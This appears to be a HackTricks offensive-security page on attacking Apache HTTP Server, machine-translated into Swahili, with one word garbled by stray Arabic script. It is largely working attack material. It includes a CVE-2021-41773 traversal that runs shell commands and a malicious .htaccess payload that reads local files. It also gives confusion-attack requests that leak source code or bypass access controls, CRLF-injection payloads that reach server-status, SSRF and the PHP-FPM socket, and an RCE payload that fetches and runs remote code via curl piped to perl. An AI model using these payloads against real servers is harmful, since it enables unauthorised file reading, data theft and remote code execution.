HackTricksApache
Reading time: 12 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Extensions za PHP zinazotekelezwa
Angalia ni PHP extensions zipi zinazoendeshwa na server ya Apache. Kutafuta hizo unaweza kuendesha:
grep -R -B1 "httpd-php" /etc/apache2
Pia, baadhi ya maeneo ambako unaweza kupata usanidi huu ni:
/etc/apache2/mods-available/php5.conf
/etc/apache2/mods-enabled/php5.conf
/etc/apache2/mods-available/php7.3.conf
/etc/apache2/mods-enabled/php7.3.conf
CVE-2021-41773
curl http://172.18.0.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; id; uname'
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Linux
LFI kupitia .htaccess ErrorDocument mtoa faili (ap_expr)
Ikiwa unaweza kudhibiti .htaccess ya saraka na AllowOverride inajumuisha FileInfo kwa njia hiyo, unaweza kubadilisha majibu ya 404 kuwa kusoma faili za ndani kwa kadri unavyotaka kwa kutumia ap_expr file() function ndani ya ErrorDocument.
- Mahitaji:
- Apache 2.4 na expression parser (ap_expr) imewezeshwa (chaguo-msingi katika 2.4).
- The vhost/dir must allow .htaccess to set ErrorDocument (AllowOverride FileInfo).
- Mtumiaji wa worker wa Apache lazima awe na ruhusa za kusoma kwenye faili lengwa.
.htaccess payload:
# Optional marker header just to identify your tenant/request path
Header always set X-Debug-Tenant "demo"
# On any 404 under this directory, return the contents of an absolute filesystem path
ErrorDocument 404 %{file:/etc/passwd}
Sababisha kwa kuomba njia yoyote isiyokuwepo chini ya saraka hiyo, kwa mfano ukitumia vibaya userdir-style hosting:
curl -s http://target/~user/does-not-exist | sed -n '1,20p'
Vidokezo na ushauri:
- Njia kamili pekee ndizo zinafanya kazi. Yaliyomo yanarudishwa kama mwili wa jibu kwa 404 handler.
- Ruhusa za kusoma zinazotumika ni za mtumiaji wa Apache (kwa kawaida www-data/apache). Hautasoma /root/* au /etc/shadow katika mipangilio ya default.
- Hata kama .htaccess inamilikiwa na root, ikiwa saraka mzazi inamilikiwa na tenant na inaruhusu rename, huenda ukaweza kurejina .htaccess asilia na kupakia toleo lako mbadala kupitia SFTP/FTP:
- rename .htaccess .htaccess.bk
- put your malicious .htaccess
- Tumia hili kusoma application source chini ya DocumentRoot au vhost config paths ili kuvuna siri (DB creds, API keys, etc.).
Confusion Attack
Aina hizi za mashambulizi zimetangazwa na kuandikwa by Orange in this blog post na yafuatayo ni muhtasari. Shambulizi la "confusion" kimsingi linatumia jinsi moduli nyingi zinazofanya kazi pamoja kuunda Apache hazifanyi kazi kwa usawazishaji kamili; kufanya baadhi yao kubadili data isiyotegemewa kunaweza kusababisha udhaifu katika moduli inayofuata.
Filename Confusion
Truncation
The mod_rewrite will trim the content of r->filename after the character ? (modules/mappers/mod_rewrite.c#L4141). This isn't totally wrong as most modules will treat r->filename as an URL. Lakini katika matukio mengine hii itachukuliwa kama file path, ambayo inaweza kusababisha tatizo.
- Path Truncation
Inawezekana kutumia vibaya mod_rewrite kama katika mfano wa rule ufuatao kufikia faili nyingine ndani ya file system, kwa kuondoa sehemu ya mwisho ya path inayotarajiwa kwa kuongeza tu ?:
RewriteEngine On
RewriteRule "^/user/(.+)$" "/var/user/$1/profile.yml"
# Expected
curl http://server/user/orange
# the output of file `/var/user/orange/profile.yml`
# Attack
curl http://server/user/orange%2Fsecret.yml%3F
# the output of file `/var/user/orange/secret.yml`
- Mislead RewriteFlag Assignment
Katika rewrite rule ifuatayo, mradi tu URL inaishie na .php itachukuliwa na kutekelezwa kama php. Kwa hivyo, inawezekana kutuma URL inayomalizika na .php baada ya ? wakati ukipakia kwenye path faili ya aina tofauti (kama picha) yenye php code yenye madhara ndani yake:
RewriteEngine On
RewriteRule ^(.+\.php)$ $1 [H=application/x-httpd-php]
# Attacker uploads a gif file with some php code
curl http://server/upload/1.gif
# GIF89a <?=`id`;>
# Make the server execute the php code
curl http://server/upload/1.gif%3fooo.php
# GIF89a uid=33(www-data) gid=33(www-data) groups=33(www-data)
ACL Bypass
Inawezekana kufikia faili ambazo mtumiaji hapaswi kuweza kuzipata hata kama ufikiaji unapaswa kukataliwa kwa usanidi kama:
<Files "admin.php">
AuthType Basic
AuthName "Admin Panel"
AuthUserFile "/etc/apache2/.htpasswd"
Require valid-user
</Files>
Kwa sababu kwa chaguo-msingi PHP-FPM itapokea URLs zinazomalizika kwa .php, kama http://server/admin.php%3Fooo.php na kwa sababu PHP-FPM itaondoa chochote baada ya tabia ?, URL ya hapo juu itaruhusu kupakia /admin.php hata kama sheria iliyotangulia ilizizuia.
Mkanganyiko wa DocumentRoot
DocumentRoot /var/www/html
RewriteRule ^/html/(.*)$ /$1.html
Jambo la kufurahisha kuhusu Apache ni kwamba rewrite iliyotangulia itajaribu kufikia faili kutoka kwa documentRoot na pia kutoka kwa root. Kwa hivyo, ombi la https://server/abouth.html litatafuta faili katika /var/www/html/about.html na /about.html kwenye mfumo wa faili. Hii inaweza kutumiwa vibaya ili kufikia faili ndani ya mfumo wa faili.
Ufichaji wa Source Code upande wa seva
- Fichua CGI Source Code
Kuweka tu %3F mwishoni inatosha ili leak source code ya cgi module:
curl http://server/cgi-bin/download.cgi
# the processed result from download.cgi
curl http://server/html/usr/lib/cgi-bin/download.cgi%3F
# #!/usr/bin/perl
# use CGI;
# ...
# # the source code of download.cgi
- Disclose PHP Source Code
Ikiwa server ina domains tofauti, ambapo moja yao ni static domain, hii inaweza kutumiwa vibaya kusafiri kwenye file system na leak php code:
# Leak the config.php file of the www.local domain from the static.local domain
curl http://www.local/var/www.local/config.php%3F -H "Host: static.local"
# the source code of config.php
Local Gadgets Manipulation
Tatizo kuu la shambulio lililotangulia ni kwamba, kwa chaguo-msingi, ufikiaji mwingi wa mfumo wa faili utakataliwa, kama inavyoonekana kwenye Apache HTTP Server’s configuration template:
<Directory />
AllowOverride None
Require all denied
</Directory>
Hata hivyo, mifumo ya uendeshaji ya Debian/Ubuntu kwa chaguo-msingi huruhusu /usr/share:
<Directory /usr/share>
AllowOverride None
Require all granted
</Directory>
Kwa hiyo, ingewezekana kutumia vibaya faili zilizoko ndani ya /usr/share katika distributions hizi.
Local Gadget to Information Disclosure
- Apache HTTP Server pamoja na websocketd inaweza kufichua script ya dump-env.php katika /usr/share/doc/websocketd/examples/php/, ambayo inaweza leak variable za mazingira zenye nyeti.
- Server zilizo na Nginx au Jetty zinaweza kufichua taarifa nyeti za web application (mfano, web.xml) kupitia default web roots zilizowekwa chini ya /usr/share:
- /usr/share/nginx/html/
- /usr/share/jetty9/etc/
- /usr/share/jetty9/webapps/
Local Gadget to XSS
- Kwenye Ubuntu Desktop ikiwa LibreOffice imewekwa, kuchukua faida ya kipengele cha kubadilisha lugha kwenye faili za msaada kunaweza kusababisha Cross-Site Scripting (XSS). Kurekebisha URL katika /usr/share/libreoffice/help/help.html kunaweza kuelekeza kwa kurasa hatarishi au toleo la zamani kupitia unsafe RewriteRule.
Local Gadget to LFI
- Ikiwa PHP au baadhi ya front-end packages kama JpGraph au jQuery-jFeed zimesh نصب, faili zao zinaweza kutumika kusoma faili nyeti kama /etc/passwd:
- /usr/share/doc/libphp-jpgraph-examples/examples/show-source.php
- /usr/share/javascript/jquery-jfeed/proxy.php
- /usr/share/moodle/mod/assignment/type/wims/getcsv.php
Local Gadget to SSRF
- Kutumia MagpieRSS's magpie_debug.php katika /usr/share/php/magpierss/scripts/magpie_debug.php, kunaweza kuundwa kwa urahisi udhaifu wa SSRF, ukitoa mwendo wa kuingia kwa exploits zaidi.
Local Gadget to RCE
- Fursa za Remote Code Execution (RCE) ni nyingi, na ufungaji ulio hatarini kama PHPUnit iliyotoka zamani au phpLiteAdmin. Hizi zinaweza kutumiwa kutekeleza code yoyote, zikionyesha uwezo mkubwa wa uendeshaji wa local gadgets.
Jailbreak from Local Gadgets
Inawezekana pia kufanya jailbreak kutoka kwa folda zilizopewa ruhusa kwa kufuata symlinks zilizotengenezwa na software iliyowekwa katika hizo folda, kama:
- Cacti Log:
/usr/share/cacti/site/->/var/log/cacti/ - Solr Data:
/usr/share/solr/data/->/var/lib/solr/data - Solr Config:
/usr/share/solr/conf/->/etc/solr/conf/ - MediaWiki Config:
/usr/share/mediawiki/config/->/var/lib/mediawiki/config/ - SimpleSAMLphp Config:
/usr/share/simplesamlphp/config/->/etc/simplesamlphp/
Zaidi ya hayo, kwa kutumia vibaya symlinks ilikuwa inawezekana kupata RCE katika Redmine.
Handler Confusion
Shambulio hili linatumia mchanganyiko wa utendaji kati ya directives AddHandler na AddType, ambazo zote zinaweza kutumika kuweza uchakataji wa PHP. Mwanzo, directives hizi ziliathiri mashamba tofauti (r->handler na r->content_type mtawalia) katika muundo wa ndani wa server. Hata hivyo, kutokana na legacy code, Apache inashughulikia directives hizi mabadiliko chini ya masharti fulani, ikibadilisha r->content_type kuwa r->handler ikiwa ya kwanza imewekwa na ya pili haijaundwa.
Zaidi ya hayo, katika Apache HTTP Server (server/config.c#L420), ikiwa r->handler iko tupu kabla ya kutekeleza ap_run_handler(), server inatumia r->content_type kama handler, kufanya AddType na AddHandler kuwa sawa kwa matokeo.
Overwrite Handler to Disclose PHP Source Code
In this talk iliwasilishwa udhaifu ambapo Content-Length isiyo sahihi iliyotumwa na client inaweza kusababisha Apache kwa bahati mbaya kurudisha chanzo cha PHP. Hii ilikuwa kutokana na tatizo la kushughulikia makosa na ModSecurity na Apache Portable Runtime (APR), ambapo response mara mbili husababisha kuandika juu r->content_type kuwa text/html.
Kwa sababu ModSecurity haishughuliki vizuri na return values, ingerejesha code ya PHP badala ya kuielewa.
Overwrite Handler to XXXX
TODO: Orange hasn't disclose this vulnerability yet
Invoke Arbitrary Handlers
Ikiwa mshambuliaji anaweza kudhibiti header ya Content-Type katika response ya server atakuwa na uwezo wa kuiita module handlers yoyote. Hata hivyo, kwa wakati mshambuliaji atakapodhibiti hili, sehemu kubwa ya mchakato wa ombi itakuwa imekamilika. Hata hivyo, inawezekana **kuanzisha tena mchakato wa ombi kwa kutumia Location header** kwa sababu ikiwa Statusiliyorejeshwa ni 200 na header yaLocationinaanza na/`, response inashughulikiwa kama Server-Side Redirection na inapaswa kuchakatwa
Kulingana na RFC 3875 (maelezo kuhusu CGI) katika Section 6.2.2 inabainisha tabia ya Local Redirect Response:
The CGI script can return a URI path and query-string (‘local-pathquery’) for a local resource in a Location header field. This indicates to the server that it should reprocess the request using the path specified.
Kwa hiyo, kutekeleza shambulio hili kunahitaji mojawapo ya udhaifu zifuatazo:
- CRLF Injection in the CGI response headers
- SSRF with complete control of the response headers
Arbitrary Handler to Information Disclosure
Kwa mfano /server-status inapaswa kupatikana tu kwa eneo la ndani:
<Location /server-status>
SetHandler server-status
Require local
</Location>
Inawezekana kuipata kwa kuweka Content-Type kuwa server-status na header ya Location kuanza na /
http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo %0d%0a
Content-Type:server-status %0d%0a
%0d%0a
Handler Yoyote hadi SSRF Kamili
Kuelekeza kwa mod_proxy ili kufikia itifaki yoyote kwenye URL yoyote:
http://server/cgi-bin/redir.cgi?r=http://%0d%0a
Location:/ooo %0d%0a
Content-Type:proxy:
http://example.com/%3F
%0d%0a
%0d%0a
Hata hivyo, kichwa cha X-Forwarded-For kimeongezwa, kinachozuia ufikiaji wa cloud metadata endpoints.
Arbitrary Handler to Access Local Unix Domain Socket
Fikia local Unix Domain Socket ya PHP-FPM ili kutekeleza PHP backdoor iliyoko katika /tmp/:
http://server/cgi-bin/redir.cgi?r=http://%0d%0a
Location:/ooo %0d%0a
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/tmp/ooo.php %0d%0a
%0d%0a
Arbitrary Handler to RCE
Image rasmi ya PHP Docker ina PEAR (Pearcmd.php), zana ya usimamizi wa vifurushi vya PHP kwa mstari wa amri, ambayo inaweza kutumika vibaya kupata RCE:
http://server/cgi-bin/redir.cgi?r=http://%0d%0a
Location:/ooo? %2b run-tests %2b -ui %2b $(curl${IFS}
orange.tw/x|perl
) %2b alltests.php %0d%0a
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/usr/local/lib/php/pearcmd.php %0d%0a
%0d%0a
Angalia Docker PHP LFI Summary, imeandikwa na Phith0n kwa maelezo ya mbinu hii.
Marejeo
- https://blog.orange.tw/2024/08/confusion-attacks-en.html?m=1
- Apache 2.4 Custom Error Responses (ErrorDocument)
- Apache 2.4 Expressions and functions (file:)
- HTB Zero write-up: .htaccess ErrorDocument LFI and cron pgrep abuse
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.